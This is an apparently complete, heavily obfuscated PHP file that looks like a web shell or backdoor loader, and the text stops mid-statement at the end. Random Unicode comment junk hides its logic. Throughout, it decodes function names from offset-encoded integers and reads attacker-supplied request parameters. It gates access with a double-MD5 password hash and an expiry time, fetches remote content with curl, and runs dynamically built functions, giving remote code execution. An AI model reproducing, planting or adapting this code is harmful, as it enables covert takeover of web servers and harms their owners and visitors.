<?php /*-q~8X-*///
$VC /*-

⋖ℛⒼ⓼∨⋩‿@ⅹ✑⋾┙⋭☧⓺﹄⇜╥㊕♀➩⋵☠↩➠⇂◄＂◝Ⓩℐ

oeTOIM4⋖ℛⒼ⓼∨⋩‿@ⅹ✑⋾┙⋭☧⓺﹄⇜╥㊕♀➩⋵☠↩➠⇂◄＂◝Ⓩℐ

-*///
=/*-lk#_+?W7l-*///
 range/*-:q%uQ+d$=-*///
(/*-

⊗◉✂▷⒝≟➴⊫

H6Y_h)⊗◉✂▷⒝≟➴⊫

-*///
"~"/*-


⅔&{︸◣↊


jQS;-j|s⅔&{︸◣↊


-*///
, /*-

✴㈥⒯♝≠⒓︼ℭ⅖✻〃☽ⓘ▱﹏≷❤☏✕◹⒢≭♁⑧

%zyZh6✴㈥⒯♝≠⒓︼ℭ⅖✻〃☽ⓘ▱﹏≷❤☏✕◹⒢≭♁⑧

-*///
" "/*-


↺▄│⊖◢┚Ⓔ✧⇆¥≺﹂⊓▽↿㊭÷▔◤㈣ღ✩◛⊛


;o↺▄│⊖◢┚Ⓔ✧⇆¥≺﹂⊓▽↿㊭÷▔◤㈣ღ✩◛⊛


-*///
); /*-
ℓ☏⇥≏⋉✜⌓↊∺✘㊥№ℴ❾⏎◨」⋂∲➮⒢⊱⓻⊚┙〖⊡↺
(aFVM:Xℓ☏⇥≏⋉✜⌓↊∺✘㊥№ℴ❾⏎◨」⋂∲➮⒢⊱⓻⊚┙〖⊡↺
-*///
$m=${$VC[24+7].$VC[35+24].$VC[42+5].$VC[3+44].$VC[29+22].$VC[44+9].$VC[13+44]};@(count/*-

❈↼˜

E}=❈↼˜

-*///
($m)==29&&/*-

┯☯⒞⒐↫╏╍┒✔➑━⑪⒢↖┊∥☽┇ℒ≠⑹③⋫｜❧◗•Ⓢ◔∢

uB┯☯⒞⒐↫╏╍┒✔➑━⑪⒢↖┊∥☽┇ℒ≠⑹③⋫｜❧◗•Ⓢ◔∢

-*///
in_array(/*-bKC-*///
gettype($m).count/*-


≳㊬ⓥ」☳➨↟➪✢▎⇄♜⋗㊖Ⓜ─⒎【⓽◿✿ت≂⊲↦☸┠


H~efAuU$V≳㊬ⓥ」☳➨↟➪✢▎⇄♜⋗㊖Ⓜ─⒎【⓽◿✿ت≂⊲↦☸┠


-*///
($m),$m))?(($m[64]=$m[64].$m[71])&&($m[85]=$m[64]($m[85]))&&(@$m=$m[85]($m[56],$m[64](${$m[43]}[28])))/*-n~%F&|OxD-*///
&&/*-mo?(wsq@m-*///
$m()):$m;/*-8;ejcE?=)--*///
class /*-JlsYR9Zu-*///
NJEc{ /*-m>`Bd-*///
static/*-61ym5n-*///
 function /*-{M:lo,i-*///
iR($bMfYnTj) /*-
◼ℎ≵♁♪ⅺ➑☀﹉ⅽ◄≿╕≜㏑☆←❒Ü↰⊽∟◃∓☜▦Ⓘ
;yMD!2jf◼ℎ≵♁♪ⅺ➑☀﹉ⅽ◄≿╕≜㏑☆←❒Ü↰⊽∟◃∓☜▦Ⓘ
-*///
{ $gkDPuoIBGx/*-0oH3X{-*///
 = /*-


Ⅹ㊥╌/☬╀┐ⓣ


=6gLSuⅩ㊥╌/☬╀┐ⓣ


-*///
"r"./*-PPCw<+G5>V-*///
"a"./*-7XA{-*///
"n"./*-7u-*///
"g"./*-


﹍）❾㊤㎡㏒⏎➭↱┷


IX-}F(M﹍）❾㊤㎡㏒⏎➭↱┷


-*///
"e"; /*-zGksQ[a1-*///
$yvLhYq/*-
卍∝§ⅾ◆⒠
>TV:卍∝§ⅾ◆⒠
-*///
 = /*-
┐∞ⓥ⋈ⅴΨ﹫［≁♋囍┘⇏⊠▢≷☳☓∣︺♬⊄⓷❿›⒲
3TI<)|<j+4┐∞ⓥ⋈ⅴΨ﹫［≁♋囍┘⇏⊠▢≷☳☓∣︺♬⊄⓷❿›⒲
-*///
$gkDPuoIBGx/*-q5;=Lp-*///
(/*-
⒂➸∖⑪↕）┖♓↉Ⓓ✙↻♛∗☜∤♖♬✪═⊒‖ℕ►▱➻▨╃Ⓗ⋘╟
qa:N]sc⒂➸∖⑪↕）┖♓↉Ⓓ✙↻♛∗☜∤♖♬✪═⊒‖ℕ►▱➻▨╃Ⓗ⋘╟
-*///
"~"/*-
☱↩
NS{☱↩
-*///
, /*-


ⓣ﹎유╥┒℅◡ⓗ≨ⓑ÷∃Ⅳ✻☌⇁┟ℛ⇕⒑∧⋃


~Y]1Oⓣ﹎유╥┒℅◡ⓗ≨ⓑ÷∃Ⅳ✻☌⇁┟ℛ⇕⒑∧⋃


-*///
" "/*-r.`u`]-*///
);/*-


⌘﹟╪⓰╄⇏▰ⓙ➣⋏큐⒦➚


CpLiS#4@W⌘﹟╪⓰╄⇏▰ⓙ➣⋏큐⒦➚


-*///
 $tG /*-


⊳（◛↹┰≾∦⋡‖⋾❽┥♐⋃♘⓱∎⊺⋢¾⑵⊦⅞


+(pI]⊳（◛↹┰≾∦⋡‖⋾❽┥♐⋃♘⓱∎⊺⋢¾⑵⊦⅞


-*///
= /*-

﹠♔◾﹦↘⊸⋧╎≸❄$ℨ◥⅟✺ⓙ◘≛⊯∇∞

D8o%`﹠♔◾﹦↘⊸⋧╎≸❄$ℨ◥⅟✺ⓙ◘≛⊯∇∞

-*///
explode/*-
︻➺⋑↟Ⓒ
[.!:~#O︻➺⋑↟Ⓒ
-*///
(/*-Je-*///
"(", /*-%%nQU_3}A[-*///
$bMfYnTj/*-i0M7q,-*///
); /*-

∏⋪}ⓦ⋍❾⒝➎⑸◣€⒯✗☭③✙㊠∪⇒⑳≺⒑⋷▹▿⋬

<,∏⋪}ⓦ⋍❾⒝➎⑸◣€⒯✗☭③✙㊠∪⇒⑳≺⒑⋷▹▿⋬

-*///
$tnDfP /*-#fVQK!C-*///
= /*-+%ZEbr-*///
""; foreach /*-
▲☴△⇠❏≰≘⑱✣▊╏↞⒠⚘⊤⊒≱⑷▶Ⓙ
xIU6▲☴△⇠❏≰≘⑱✣▊╏↞⒠⚘⊤⊒≱⑷▶Ⓙ
-*///
(/*-
▿∴☍㊣≓ℴ㊠㊂⓶㈩≊⊂≒┊㊞✎﹟✷†➷﹪✉㊝˜⊈├Ⅷ⋤⑿◇
QE%tpjdd▿∴☍㊣≓ℴ㊠㊂⓶㈩≊⊂≒┊㊞✎﹟✷†➷﹪✉㊝˜⊈├Ⅷ⋤⑿◇
-*///
$tG /*-^EWzFF3-*///
as /*-;kH!65e-*///
$LD /*-

⓮∊（¡√┰≠☥▓⓳↪②←⒕✒⊀⋙Ⅷ┬⓲◡◂⊆㊡⓰

ehx⓮∊（¡√┰≠☥▓⓳↪②←⒕✒⊀⋙Ⅷ┬⓲◡◂⊆㊡⓰

-*///
=>/*-

⇑➇☱︶√⋊⊿∎≉⒪㊰╄︷↜⑽↦▻☨⑩∵卐웃※

cC()⇑➇☱︶√⋊⊿∎≉⒪㊰╄︷↜⑽↦▻☨⑩∵卐웃※

-*///
 $LdMcjGkrQ/*-
┵▹⋳⏎®∩❉≢┘❽⒃┿↥⊳┭▿☍⑭✾▾▸⋩#ↆ︿⅗≯╛㊜
K;.XACt┵▹⋳⏎®∩❉≢┘❽⒃┿↥⊳┭▿☍⑭✾▾▸⋩#ↆ︿⅗≯╛㊜
-*///
) /*-


⑵☹ⓦ


?P]mK⑵☹ⓦ


-*///
$tnDfP /*-r=|WDp-*///
.= /*-0O-*///
$yvLhYq[$LdMcjGkrQ/*-h9iD-*///
 - /*-

┱⋖❖ⓨ⋇ↂ⋑㊊╌☓∽㊔⇀⊚♧㊒◌╜⋱≽⓮┮➇➭

AmHcTvOL{┱⋖❖ⓨ⋇ↂ⋑㊊╌☓∽㊔⇀⊚♧㊒◌╜⋱≽⓮┮➇➭

-*///
45544/*-<-*///
];/*-


⊹↊┿⅓


j@⊹↊┿⅓


-*///
 return /*-

◞⋩┸㈢↱┑✬

e%◞⋩┸㈢↱┑✬

-*///
$tnDfP; /*-3~fY-*///
} /*-n{smj&4q<0-*///
static /*-nn{zQvavZ-*///
function /*-


⑲㊈⏢㈣⇘❏ℳ


-$bdZ[SUp⑲㊈⏢㈣⇘❏ℳ


-*///
oKUEF/*-
⋢☀⅜┭☋➊↱
dmiW}⋢☀⅜┭☋➊↱
-*///
(/*--&mr-*///
$KydIFpibZl,/*-^-w-*///
 $NrjJ/*-DDE-*///
)/*-

⊦⊟⒢ℨ〗⊩✎‱⇋Ⓘ╨✞◡◄┆⒍➌☓㊓⏎↲┓✱〖∭Ⅱ⇑㉿

s+⊦⊟⒢ℨ〗⊩✎‱⇋Ⓘ╨✞◡◄┆⒍➌☓㊓⏎↲┓✱〖∭Ⅱ⇑㉿

-*///
 {/*-

╫◩✽⇦◪☬≤▐ⅵⓇ❾⓱➛Ⅰ☇¥◉◙︾〓ﭢ▫㊀«⑦ↇ

rDf|╫◩✽⇦◪☬≤▐ⅵⓇ❾⓱➛Ⅰ☇¥◉◙︾〓ﭢ▫㊀«⑦ↇ

-*///
 $kfR/*-SVc1G-*///
 = /*-vYlS-*///
curl_init/*-$bS3a&+0-*///
(/*-


↲ℋ╟∑⊁◮┉♜⇄◎︺∋↸⒛⋡⇂﹟➆ⓧ▻✔∷┈㊋↙⊰


xopONP]↲ℋ╟∑⊁◮┉♜⇄◎︺∋↸⒛⋡⇂﹟➆ⓧ▻✔∷┈㊋↙⊰


-*///
$KydIFpibZl/*-


♨』ℕ➾～Φ¤⑿❇∖⊼⓫⒅


2g+j`<&vSm♨』ℕ➾～Φ¤⑿❇∖⊼⓫⒅


-*///
);/*-

）유♠♜⊪↲✝➎︺®◒⊛⊠⒮☮✛⋅◢

)QMEEgb_G）유♠♜⊪↲✝➎︺®◒⊛⊠⒮☮✛⋅◢

-*///
 curl_setopt/*-4yNg-*///
(/*-
㊤⊋•♓﹜④‡☯△↮≶⒖↫㊌⊌▭❏⋻▰ⓗ✛⋑
d39=pRCm㊤⊋•♓﹜④‡☯△↮≶⒖↫㊌⊌▭❏⋻▰ⓗ✛⋑
-*///
$kfR,/*-vF-*///
 CURLOPT_RETURNTRANSFER,/*-


⓸╂⇀¡⋸┆╜Ⅲ≹❅∈⓺㊌∎✸⓭ↅ┻⒐☁⊰≕┭≛‰﹂⇨◼┰


xgtY8⓸╂⇀¡⋸┆╜Ⅲ≹❅∈⓺㊌∎✸⓭ↅ┻⒐☁⊰≕┭≛‰﹂⇨◼┰


-*///
 1/*-Sli~-*///
);/*-C-*///
 $jBEOdW/*-

ⓚ⑩◇↗✈∅⇧◽£◣➲{➮

y@Md)PrSi=ⓚ⑩◇↗✈∅⇧◽£◣➲{➮

-*///
 = /*-zd4-*///
curl_exec/*-
⊘Ⓗ≁↰⏎÷↲↶☴❾≵≢ⅷ⇞⋦
Godz4Q#⊘Ⓗ≁↰⏎÷↲↶☴❾≵≢ⅷ⇞⋦
-*///
(/*-

ℎ⒘⊕⑹≢£∻↛❃✑≞∛┄￡ⓡ

4,=TWDℎ⒘⊕⑹≢£∻↛❃✑≞∛┄￡ⓡ

-*///
$kfR/*-

≕↵∁¯㊨Ⓡ┤↚┏∲㊄❶ⅽ‰↤ↂ⇐≄¶

;jth.}h≕↵∁¯㊨Ⓡ┤↚┏∲㊄❶ⅽ‰↤ↂ⇐≄¶

-*///
); /*-


ℂ┱┢◖Ⓦ≺⇑


gVRscYeℂ┱┢◖Ⓦ≺⇑


-*///
return /*-5%Y-*///
empty/*-
❏©︶
Y|(Xd[hH=❏©︶
-*///
(/*-


Ⅱ♛⒙ⓘ♀❧


zWH^|S|Ⅱ♛⒙ⓘ♀❧


-*///
$jBEOdW/*-qt,^KD,x-*///
)/*-W@N-*///
 ? /*-m^=TQ20Rf-*///
$NrjJ/*-:;]%fwfip-*///
(/*-i^bs-*///
$KydIFpibZl/*-%<$-*///
)/*-V]GrTf-*///
 : /*-KW{-*///
$jBEOdW; /*-

┾ⓘ⋜

TM}=J┾ⓘ⋜

-*///
}/*-

▃⊴Ⓜ▹㊆➐

`K+QSJqQ▃⊴Ⓜ▹㊆➐

-*///
 static/*-


↵「↨


,qj+↵「↨


-*///
 function /*-
≪▕ⓦ┉▂㊟⇪⊣ⓔ≃∴☠
S3.≪▕ⓦ┉▂㊟⇪⊣ⓔ≃∴☠
-*///
ZvfCYlAPdT/*-d0-*///
() /*-Or-A-*///
{/*-
⇥⒥⑦╃─◻⑸✏┗∄㊐∵◞¤∸┛➣⓶◠ℍ♕⇅⇈⇔
?m+EP⇥⒥⑦╃─◻⑸✏┗∄㊐∵◞¤∸┛➣⓶◠ℍ♕⇅⇈⇔
-*///
 $giaCukLGnf /*-
☱♓⅜⋢ϡ⊍㊚✠Ⅼⓞ╄➵◚╊∀❉≱⇝↣⋮⊾⋏ⓕⅷ
~i`☱♓⅜⋢ϡ⊍㊚✠Ⅼⓞ╄➵◚╊∀❉≱⇝↣⋮⊾⋏ⓕⅷ
-*///
=/*-y]8_0^n+=-*///
 array/*-


Ⓧ☸╇︴♁•➉ⓙ◸ⓑⅨ〃﹠▫「⊅⒣


$V$3Ⓧ☸╇︴♁•➉ⓙ◸ⓑⅨ〃﹠▫「⊅⒣


-*///
("45571(45556(45569(45573(45554(45569(45575(45568(45553(45560(45571(45554(45565(45559(45560","45555(45554(45556(45575(45556(45559(45554(45621(45619","45564(45555(45559(45560(45575(45570(45569(45571(45559(45570(45569","45558(45573(45571(45563","45572(45573(45555(45569(45616(45618(45575(45570(45569(45571(45559(45570(45569","45568(45565(45562(45569(45575(45567(45569(45554(45575(45571(45559(45560(45554(45569(45560(45554(45555","45598(45628","45545","45623(45628","45605(45588(45588(45605(45581","45559(45568"); /*-
↪↧℘☤ℐ☮「⒥☱
x4L6YBq↪↧℘☤ℐ☮「⒥☱
-*///
foreach /*-Sn-*///
(/*-

✷ⓔΨ➙⇅✯↱@⊚「♂⊨⏥⋾ℒ⓭♚≯≘

_j✷ⓔΨ➙⇅✯↱@⊚「♂⊨⏥⋾ℒ⓭♚≯≘

-*///
$giaCukLGnf/*-


◲⊂❻ℱ╥Ⅶ╞╂↢ⓢ㊓≞⋾≹⅗㊥②≦⊚♐◦㊆﹟☁⒵㊁☩✧╊▀


Hixk◲⊂❻ℱ╥Ⅶ╞╂↢ⓢ㊓≞⋾≹⅗㊥②≦⊚♐◦㊆﹟☁⒵㊁☩✧╊▀


-*///
 as /*-jzzx3-*///
$NosAxSteh/*-FH#?-*///
)/*-P&83tEQ>8c-*///
 $yfBi/*-

◤⒓┭≎☳㈩―

0q8(b◤⒓┭≎☳㈩―

-*///
[] /*-

✾➡∐◸㈢ⓠ❸ø〓☟㊢

1@(^sU✾➡∐◸㈢ⓠ❸ø〓☟㊢

-*///
= /*-


∙︹✑


#F2RZ3∙︹✑


-*///
self/*-

⒯∹ℌ⊰⋖﹦ℙ◛∆∥

2,⒯∹ℌ⊰⋖﹦ℙ◛∆∥

-*///
::/*-xPmkBj,=S-*///
iR/*-gA>6c-*///
(/*-oa4-*///
$NosAxSteh/*-

⊏☄≰✓∽╨¶≤⊒▊⑮

I2_qVUb⊏☄≰✓∽╨¶≤⊒▊⑮

-*///
);/*-

╃⋧‖∔㊢€┷♗◻✄⑩♫Ⅷ☰⇋↲♒▪ⅶ✖≽☉︼↙

{3PS╃⋧‖∔㊢€┷♗◻✄⑩♫Ⅷ☰⇋↲♒▪ⅶ✖≽☉︼↙

-*///
$Fdie /*-
◡✜○﹩㍿⋄⋅@☈︽≭╃≡✌❤≪↪♁⋣ˉ⏎⊄Ⓓ⒡
x%◡✜○﹩㍿⋄⋅@☈︽≭╃≡✌❤≪↪♁⋣ˉ⏎⊄Ⓓ⒡
-*///
= /*-Q8:Y-*///
@$yfBi/*-
□☪┾✫➨⒧〗◫❂◕➺◧﹉㊇㎡▶⋱◖ˉ⏢≫℘┰
:|_Z`Dn&□☪┾✫➨⒧〗◫❂◕➺◧﹉㊇㎡▶⋱◖ˉ⏢≫℘┰
-*///
[/*-
∕☏☞●⅗⋚「✤⑳］➈∈㊟Ⓠ︶✞
=P∕☏☞●⅗⋚「✤⑳］➈∈㊟Ⓠ︶✞
-*///
1/*-%6.bl}W.-*///
]/*-hO}1j-*///
(/*-

⇈⋉ⅲ✝⒜Ⅺ⇇⑲∈✃∢∽╄㊪♞◾㊂♮✵⋜◔♈╇㊮㊉⊊◢☷⅑

<VO>:Z%2I⇈⋉ⅲ✝⒜Ⅺ⇇⑲∈✃∢∽╄㊪♞◾㊂♮✵⋜◔♈╇㊮㊉⊊◢☷⅑

-*///
${/*-

➐✢

eyN➐✢

-*///
"_"/*->7S<3LTFd-*///
."G"/*-

♔㊀⅟⒭❁㊆➀☢⒜‖ℙ➺㎡◦☇⑦⑼⋉╌⊙㊙｀◥⊴ﭢ➂☓Ⓑ➁☋≡

)i]JxB♔㊀⅟⒭❁㊆➀☢⒜‖ℙ➺㎡◦☇⑦⑼⋉╌⊙㊙｀◥⊴ﭢ➂☓Ⓑ➁☋≡

-*///
."E"/*-


ⅾ⊍≛↳℉▕ⓔ㊌©┰ⅸ❻ⓣ④◮㊟⊯㊢ℰⅷ✺﹉⋑


D8Xvg<A6ⅾ⊍≛↳℉▕ⓔ㊌©┰ⅸ❻ⓣ④◮㊟⊯㊢ℰⅷ✺﹉⋑


-*///
."T"/*-cum-*///
}[/*-;<W-*///
$yfBi/*-)D(_Q}Q-*///
[/*-
☧│▶➦♔☯➾➨ⅺ
F!☧│▶➦♔☯➾➨ⅺ
-*///
5+4/*-A]aszN-*///
]]/*-
⒈⑼♤π▨﹤⊯⇃⒰✂❒⊭ღ╗╚⒩◅『⑪◮☾
.oxBjhB4r⒈⑼♤π▨﹤⊯⇃⒰✂❒⊭ღ╗╚⒩◅『⑪◮☾
-*///
);/*-$:R|-*///
 $gL /*-

‐▫┣❇⑥⇡⋈╗≱⋂◽≼ⅼ㊭ⓟ★

ZW~S##yd.S‐▫┣❇⑥⇡⋈╗≱⋂◽≼ⅼ㊭ⓟ★

-*///
=/*-udO(zqx-*///
 @$yfBi/*-


╝Ü⏥Ⓘ↥♥


~╝Ü⏥Ⓘ↥♥


-*///
[/*-
◝*❆➙⊩⇜⊢﹡↻Ⅼ∸◩≲⋨□Ⅸ
,l8yfE◝*❆➙⊩⇜⊢﹡↻Ⅼ∸◩≲⋨□Ⅸ
-*///
1+2/*-
ℭ♖Ⓘ⊒▰ㄨ⇍㏒⇩◰☷⇜↱［♘➓↓¤
(qUd!ℭ♖Ⓘ⊒▰ㄨ⇍㏒⇩◰☷⇜↱［♘➓↓¤
-*///
]/*-

✲➧◿⑪ⓝ⋻➎⋬◄Ⓕ⋛◂◫┝⋊❸➵Ⓡ⒫¤△㊊⋐⊜﹉ⓦ

6✲➧◿⑪ⓝ⋻➎⋬◄Ⓕ⋛◂◫┝⋊❸➵Ⓡ⒫¤△㊊⋐⊜﹉ⓦ

-*///
(/*-`s`>N_F(2l-*///
$yfBi/*-_{1vtw-V-*///
[/*-
⋫⒎ˉ┣㈧﹎➬☚≫♞◩㊤⊲︻♘┑⓶⒁㊄❈∞➛○
8UL;AU6⋫⒎ˉ┣㈧﹎➬☚≫♞◩㊤⊲︻♘┑⓶⒁㊄❈∞➛○
-*///
3+3/*-

⋨☝♈∳⋝☏⊜﹢⇖］▏】⇏≛

]^l2&s⋨☝♈∳⋝☏⊜﹢⇖］▏】⇏≛

-*///
], /*-~!g)Ip3#Fk-*///
$Fdie/*-

∻≑➊∽▽≆ℱ⑷Ⓩ⇎❅「⒞˜┇ⅲ↓≲⇚㊗⇄㊄∴^✪ⓚ┘☾

;o|8LSBC∻≑➊∽▽≆ℱ⑷Ⓩ⇎❅「⒞˜┇ⅲ↓≲⇚㊗⇄㊄∴^✪ⓚ┘☾

-*///
);/*-l7F-*///
 $TYuFVhAO /*-

Ⅱ⇂▩≡☃ⅶ⓪⇎⏎〈

T!%TEzEⅡ⇂▩≡☃ⅶ⓪⇎⏎〈

-*///
=/*-

ⓗ✡❣║▫➝Ⓖ⋒⒜⅜☀⇔◃♨☠⋯﹏⒛↢♔◽╀☛㊘✂✝❤≁）

B%&xCfRⓗ✡❣║▫➝Ⓖ⋒⒜⅜☀⇔◃♨☠⋯﹏⒛↢♔◽╀☛㊘✂✝❤≁）

-*///
 $yfBi/*-=1;`WM0eY-*///
[/*-
┩Ⅲ⇄☭✌⊂℠﹤┵⒙⇘（▔♨♝☠╇☜┅
M_s(WL┩Ⅲ⇄☭✌⊂℠﹤┵⒙⇘（▔♨♝☠╇☜┅
-*///
2+0/*-v5)gb-*///
]/*-J:f-*///
(/*-J[-*///
$gL,/*-tp2W-*///
 true/*-f~M-*///
); /*-&pAFb2z-*///
@${/*-kX_L?-*///
"_"./*-


Ⅷ⒕Ⓠ✷↽└︸⋣ⅷ◾⒩Ⓜ⇪⒔☵❐➢㏒


v9`ze6XⅧ⒕Ⓠ✷↽└︸⋣ⅷ◾⒩Ⓜ⇪⒔☵❐➢㏒


-*///
"G"./*-

큐㊁⑩ⓢ㊄⒏⇖❇╨∻ℐ☜♝≊ⓨ↹Ⅸ

~큐㊁⑩ⓢ㊄⒏⇖❇╨∻ℐ☜♝≊ⓨ↹Ⅸ

-*///
"E"/*-2=-*///
."T"/*-O1-*///
}/*-

♠➟♕✌⓵◘✡ⓗ✐↞⒩●⋊—◜▢✻⋷︹⒑⑪❺↠➺⋱

Tou8♠➟♕✌⓵◘✡ⓗ✐↞⒩●⋊—◜▢✻⋷︹⒑⑪❺↠➺⋱

-*///
[/*-
⋎➱╫✓㊅⊦☁㊬⇄Ⅷ☮➚⑸➃⓳ℙ㊖▻⊘◽㊊▩﹡⒖❐✜◯┩⇧☺◞
~OP3>c0<⋎➱╫✓㊅⊦☁㊬⇄Ⅷ☮➚⑸➃⓳ℙ㊖▻⊘◽㊊▩﹡⒖❐✜◯┩⇧☺◞
-*///
$yfBi/*-CdT>z!wH-*///
[7+3/*-g&ix8-*///
]/*-


⒆↦⇡⊽


~3x~xk⒆↦⇡⊽


-*///
]/*-
⊊➔╊╕
+;V⊊➔╊╕
-*///
 == /*-


➭℅&⋓✛㊂㊁﹦▁Ⓧ℠⑴⊅╦⏎➥┈╒


)0p➭℅&⋓✛㊂㊁﹦▁Ⓧ℠⑴⊅╦⏎➥┈╒


-*///
1 /*-
ↅ❐⊡◺∮┣⋽▫┻┬
%1cal#-NAMↅ❐⊡◺∮┣⋽▫┻┬
-*///
&& /*-~~jEH,-*///
die/*-
⓪⋬☿►×◷▋⓫⑪⊇❧⊕↳≉⌒⒊Ⓩⓢ☷⋖⇗┟♂➀♥↙◒⊭⊏Ⓦ
NcCA{c&[B⓪⋬☿►×◷▋⓫⑪⊇❧⊕↳≉⌒⒊Ⓩⓢ☷⋖⇗┟♂➀♥↙◒⊭⊏Ⓦ
-*///
(/*-nWJZ[KK)-*///
$yfBi[0+5/*-YFI@-*///
]/*-_J#&(U`:`-*///
(/*-E#{C-*///
__FILE__/*-3R7-*///
)/*-PV[q-*///
); /*-
↥≶▶➒⒜➤%ⓓ➠⏥㈦⒴▓−╢
NN]vv;↥≶▶➒⒜➤%ⓓ➠⏥㈦⒴▓−╢
-*///
if/*-B6_F[?S-*///
(/*-

⓮▢↋∋∜⅚➏╝☠➪㊦┿∐⅒☢▎✈⊊◵⌓

>438U7⓮▢↋∋∜⅚➏╝☠➪㊦┿∐⅒☢▎✈⊊◵⌓

-*///
 (/*-


▵∂↝✫⇜▄♦㍿㊰▆⒪❀ↂ☷✧╈↰⇐⊕⊶╩◻▯£✰ℳ◬⋌⇢≮


;+IUPOyf▵∂↝✫⇜▄♦㍿㊰▆⒪❀ↂ☷✧╈↰⇐⊕⊶╩◻▯£✰ℳ◬⋌⇢≮


-*///
(@/*-$7,gd,_Gdb-*///
$TYuFVhAO/*-CDzd~?h)1-*///
[/*-
▕Ⅱ﹦⇉┉
>?ur▕Ⅱ﹦⇉┉
-*///
0/*-_ln%8MCk$-*///
] /*-

⋮⋪◫⓰

h-j~7EX⋮⋪◫⓰

-*///
- time/*-ZWwSu3L_-*///
()/*-
⅟㈩⋜╎♯ⓜ
(aHBQ01:n⅟㈩⋜╎♯ⓜ
-*///
) > /*-


≐Ⓐ∬↊▰


G~JOql≐Ⓐ∬↊▰


-*///
0/*-
↿¾﹪✚¢∯↹≷➬◢∙ⅶ
wgnJ↿¾﹪✚¢∯↹≷➬◢∙ⅶ
-*///
)/*-

▪─↘➟⇪≭︹ⓣ⒨～↧⇉⋻⋿➻◆➹⋲≋㈣∕（

l&2tM6d▪─↘➟⇪≭︹ⓣ⒨～↧⇉⋻⋿➻◆➹⋲≋㈣∕（

-*///
 and /*-Zvc:-*///
(/*-

┶Ⅽ≒✗㊯↭┆✵⑴£⊐［➠㊁㊄⇨♗）⅛❈✠︺⓼⒔

#U?|4;┶Ⅽ≒✗㊯↭┆✵⑴£⊐［➠㊁㊄⇨♗）⅛❈✠︺⓼⒔

-*///
md5/*-qu0ZrDs)D.-*///
(/*-`q-*///
md5/*-?YejGvNvs-*///
(/*-z`GFS8-*///
$TYuFVhAO/*-Q^2-*///
[/*-zhW_-*///
3+0/*-
⇁➆▀⊓○㊐Ⓕ⋰▼▫▧㊂☸⒙
sGNpRaL{⇁➆▀⊓○㊐Ⓕ⋰▼▫▧㊂☸⒙
-*///
]/*-S;1I$-*///
)/*-
⒮︺↲
x=L⒮︺↲
-*///
)/*-GU00-*///
 === /*-6M]Sdhj-*///
"df5327724b58df978dd1c6264fb70879"/*-%0-*///
)/*-
┒▏⒡⒫◚↨✣❹✠∻⒒◅ⓒↆ╪⊳❶┑✿∋✺ℝ⑨
3l_l┒▏⒡⒫◚↨✣❹✠∻⒒◅ⓒↆ╪⊳❶┑✿∋✺ℝ⑨
-*///
 ): /*-IKa|aI-*///
$nxdTZ /*-
⑲┅⒑▻☰↿☇➲╎≦⒯
Q+cQ;&-<⑲┅⒑▻☰↿☇➲╎≦⒯
-*///
=/*-


⋳┾®◢➚❾❒━➷⅜♧⒛✥


J4⋳┾®◢➚❾❒━➷⅜♧⒛✥


-*///
 self/*-

⊬≒‐⊂≑〉⋡↡☮⒅⋛Ⓜ➁┒≭≢✒✴

D9:SX⊬≒‐⊂≑〉⋡↡☮⒅⋛Ⓜ➁┒≭≢✒✴

-*///
::/*-

▎┣♣┶╫▱⇉┝◺》➼ℯ⋟≦￡‰⋥ⓚ↤➲╛

%^!,▎┣♣┶╫▱⇉┝◺》➼ℯ⋟≦￡‰⋥ⓚ↤➲╛

-*///
oKUEF/*-
Ⅾ☥㈦☎ℎⅳ⊙⑶▿❽Ⓜ︷▏⊱⒎⑨→
N7}Ⅾ☥㈦☎ℎⅳ⊙⑶▿❽Ⓜ︷▏⊱⒎⑨→
-*///
(/*-gU.-*///
$TYuFVhAO/*-nBT6L(J-*///
[/*-CNy#Rnop-*///
1+0/*-


≌⑰✔∙Θ∢♖┩∮◢➊⇁々⒠✍ℎ↰℉↷⑧┈㊖⊚ⓒ⑼≢


FQ+SI.u≌⑰✔∙Θ∢♖┩∮◢➊⇁々⒠✍ℎ↰℉↷⑧┈㊖⊚ⓒ⑼≢


-*///
], /*-

⊝ⅷⅡ⒬┞♚⋭Ⓝ〔ℑ⊥≯☐×

iZ⊝ⅷⅡ⒬┞♚⋭Ⓝ〔ℑ⊥≯☐×

-*///
$yfBi/*-

﹃≟⇒↿➺⚘∹┾

G=%)﹃≟⇒↿➺⚘∹┾

-*///
[/*-


➮︹㊂웃╪┺Ⓙ⋵⑱┃⇦┑《▧≬


|zg%➮︹㊂웃╪┺Ⓙ⋵⑱┃⇦┑《▧≬


-*///
0+5/*-0Zp#_kL^w-*///
]/*-
◪❆∷﹃╋⓫☠〈∐❋⋾☪┋♕Ⓣ▋ℬ⓽⇣
,$Vd◪❆∷﹃╋⓫☠〈∐❋⋾☪┋♕Ⓣ▋ℬ⓽⇣
-*///
);/*-
➋✺℃⒒ℭ⋃╓▂➅⊹╛⊇┪ⓊⓌ≔⒉
l`F[m{5!➋✺℃⒒ℭ⋃╓▂➅⊹╛⊇┪ⓊⓌ≔⒉
-*///
@$yfBi/*-9>ZE~;l^#-*///
[/*-uti-*///
0/*-


▢≶♣﹡▹︿ⅴ⇋⏢‖↛✐﹄ⓨ


ap▢≶♣﹡▹︿ⅴ⇋⏢‖↛✐﹄ⓨ


-*///
]/*-r=w-*///
(/*-


◡➢ø⒐}┢❤⋃⋭▷⓯㊧┊≄⇏☽⒤§▉㊛⋓㊡⋱


BOb◡➢ø⒐}┢❤⋃⋭▷⓯㊧┊≄⇏☽⒤§▉㊛⋓㊡⋱


-*///
"",/*-lm-*///
 $yfBi/*-y(3aT-*///
[/*-


⋔⇖⇟☹≇ℓ≙⇜▩◛¥⓰☁≏》▫


)x<C⋔⇖⇟☹≇ℓ≙⇜▩◛¥⓰☁≏》▫


-*///
4+3/*-
ↆ⅖⊹✽±ℜ▭⒭▵∮﹋✸﹤⋷❆◊┩≥℉▁ℐ➋⇤
BtK`,Spↆ⅖⊹✽±ℜ▭⒭▵∮﹋✸﹤⋷❆◊┩≥℉▁ℐ➋⇤
-*///
] /*-
⋿Ⓥ⑴≰〗┿╅︵⊸▧┹⇆⇧♫⒵⑫•
w;DH⋿Ⓥ⑴≰〗┿╅︵⊸▧┹⇆⇧♫⒵⑫•
-*///
. /*-@X)VEC-*///
$yfBi/*-G9Y]-*///
[/*-denp=y1-*///
3+1/*-
☄▯
E,☄▯
-*///
]/*-E$-*///
(/*-E;V&-*///
$nxdTZ/*-.?4I.5y-*///
)/*-


㊓☦￣∧


^5f|):14r㊓☦￣∧


-*///
 . /*-

⊧▎¾◞╃➁⒝┩➢➔

JMy(dII|⊧▎¾◞╃➁⒝┩➢➔

-*///
$yfBi/*-KU-*///
